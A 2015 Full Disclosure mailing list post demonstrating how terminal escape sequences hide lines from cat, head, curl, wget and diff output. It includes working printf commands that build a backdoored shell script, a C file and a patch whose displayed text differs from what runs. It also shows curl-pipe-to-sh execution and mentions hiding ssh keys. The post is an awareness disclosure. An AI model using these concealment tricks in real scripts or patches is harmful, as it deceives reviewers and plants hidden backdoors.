Full Disclosure mailing list archives

By Date By Thread s/party/hack like it's 1999 From: up201407890 () alunos dcc fc up pt

Date: Thu, 17 Sep 2015 18:05:23 +0200

Federico Bento <up201407890 () alunos dcc fc up pt> So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?" http://www.openwall.com/lists/oss-security/2015/08/11/8 This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new. How it technically works: A terminal escape sequence is a special sequence of characters that is printed (like any other text). If the terminal understands the sequence, it won't display the character-sequence, but will perform some action. While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness. $ printf '#!/bin/bash

echo doing something evil!

exit

\033[2Aecho doing something very nice!

' > backdoor.sh $ chmod +x backdoor.sh $ cat backdoor.sh #!/bin/bash echo doing something very nice! $ ./backdoor.sh doing something evil! As you can see, our beloved 'cat' cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action. And this action moves the cursor up X times, overwriting what is above it X lines. But this doesn't affect only 'cat', it affects everything that interprets escape sequences. $ head backdoor.sh #!/bin/bash echo doing something very nice! $ tail backdoor.sh #!/bin/bash echo doing something very nice! $ more backdoor.sh #!/bin/bash echo doing something very nice! It's not over yet! $ curl 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice! $ wget -qO - 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice! But if we pipe it into a shell... $ curl -s 127.0.0.1/backdoor.sh|sh doing something evil! $ wget -qO - 127.0.0.1/backdoor.sh|sh doing something evil! You might be thinking "If I opened that in my browser, I would detect it being malicious!" Well, think again... One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then. I wouldn't even be surprised if most of those install scripts that make use of these 'pipe into sh' bullcrap abused this. I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files... It's no secret, most of us rely on 'cat' to view files. I guess this is one black kitty, giving you bad luck. Here's another example with a .c file $ printf '#include <stdio.h>



int main()

{

\tprintf("doing something evil\

");

\t/*\033[2A

\t/* This simple program doesnt do much... */

\tprintf("doing something very nice\

");

\treturn 0;

}

' > nice.c $ cat nice.c #include <stdio.h> int main() { /* This simple program doesnt do much... */ printf("doing something very nice

"); return 0; } $ gcc nice.c $ ./a.out doing something evil doing something very nice 'diff' also interprets escape sequences and so do the resulting patches going back to the first example, imagine I have a backdoored.sh that is backdoored, and a legit.sh that does what it's output tells us. $ cat backdoor.sh #evil file #!/bin/bash echo doing something very nice! $ cat legit.sh #actually echoes doing something very nice! #!/bin/bash echo doing something very nice! $ diff -Naur backdoor.sh legit.sh --- backdoor.sh 2015-09-17 16:25:42.985349535 +0100 +++ legit.sh 2015-09-17 16:26:14.950158635 +0100 @@ -1,4 +1,2 @@ #!/bin/bash -echo doing something very nice! +echo doing something very nice! $ diff -Naur backdoor.sh legit.sh > file.patch $ patch legit.sh -R file.patch $ chmod +x legit.sh $ ./legit.sh doing something evil! Hint: 'less' doesn't interpret escape sequences unless the -r switch is used, so stop aliasing it to 'less -r' just because there's no colored output. s/party/hack like it's 1999 ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: s/party/hack like it's 1999 up201407890 (Sep 19)